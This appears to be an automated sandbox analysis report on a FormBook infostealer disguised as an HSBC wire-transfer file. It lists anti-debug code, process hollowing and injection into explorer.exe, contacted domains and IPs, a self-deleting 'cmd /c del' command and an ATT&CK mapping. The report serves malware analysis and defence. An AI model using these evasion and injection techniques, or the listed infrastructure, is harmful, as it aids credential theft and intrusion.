          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03718B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03715BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03651B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03651B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03718A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03684A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03684A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03658A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03663A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03702073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03711074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.83 80
          Source: C:\Windows\explorer.exeDomain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exeDomain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exeDomain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C50000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.291644026.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.327163839.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.308348112.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.316504406.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.319632104.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.301501003.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
